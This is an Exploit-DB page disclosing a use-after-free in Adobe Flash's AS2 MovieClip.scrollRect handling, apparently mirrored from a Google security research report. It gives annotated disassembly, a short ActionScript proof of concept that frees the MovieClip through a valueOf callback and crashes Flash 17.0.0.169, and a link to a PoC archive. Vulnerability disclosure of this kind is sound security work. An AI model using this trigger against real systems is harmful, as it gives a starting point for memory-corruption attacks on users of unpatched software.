Adobe Flash AS2 - MovieClip.scrollRect Use-After-Free

EDB-ID:

37854




Platform:

Windows

Date:

2015-08-19


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux , the course required to become an Offensive Security Certified Professional (OSCP)

GET CERTIFIED

Source: https://code.google.com/p/google-security-research/issues/detail?id=359&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id

[Deadline tracking for https://code.google.com/p/chromium/issues/detail?id=482521]

---
VULNERABILITY DETAILS
When setting the scrollRect attribute of a MovieClip in AS2 with a custom Rectangle it is possible to free the MovieClip while a reference remains 
in the stack

VERSION
Chrome Version: Chrome stable 42.0.2311.90, Flash 17.0.0.169
Operating System: [Win 7 SP1]

REPRODUCTION CASE
That code targets the MovieClip.scrollRect property. While setting this attribute with a custom Rectangle, it is possible to trigger a use after free by freeing the targeted MovieClip. Creating a TextField with the same depth of the targeted MovieClip is enough to free an object and have Flash crash.

These lines come from flashplayer standalone 17.0.0.169:

.text:00597F45 loc_597F45:
.text:00597F45                 cmp     eax, 6
.text:00597F48                 jnz     loc_597FE5
.text:00597F4E                 mov     ecx, esi           ; esi points to the MovieClip object
.text:00597F50                 call    sub_40C1ED
.text:00597F55                 add     eax, 30Ch
.text:00597F5A                 or      dword ptr [eax], 8
.text:00597F5D                 mov     eax, [ebx]
.text:00597F5F                 mov     byte ptr [eax+82Ch], 1
.text:00597F66                 mov     ecx, [ebx]
.text:00597F68                 lea     eax, [ebp+74h+var_1C0]
.text:00597F6E                 push    eax
.text:00597F6F                 push    dword ptr [ebx+0Ch]
.text:00597F72                 call    xfetchRectangleProperties  ; get the Rectangle properties, and execute some AS2
.text:00597F77                 test    al, al
.text:00597F79                 jz      loc_598274
.text:00597F7F                 mov     edi, [ebp+74h+var_1C0]
.text:00597F85                 mov     ecx, esi
.text:00597F87                 imul    edi, 14h
.text:00597F8A                 call    sub_40C1ED          ; reference freed memory and return a bad 

pointer
.text:00597F8F                 mov     [eax+310h], edi     ; crash here, eax = 0



Poc (compile with Flash CS5.5):

import flash.geom.Rectangle
var o2 = {}
o2.valueOf = function () {
	_global.mc.createTextField("newtf",1,1,1,2,3)
	return 7
}
var o = {x:o2,y:0,width:4,height:5}

_global.mc = this
var newmc:MovieClip = this.createEmptyMovieClip("newmc",1)
newmc.scrollRect = o
---

Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37854.zip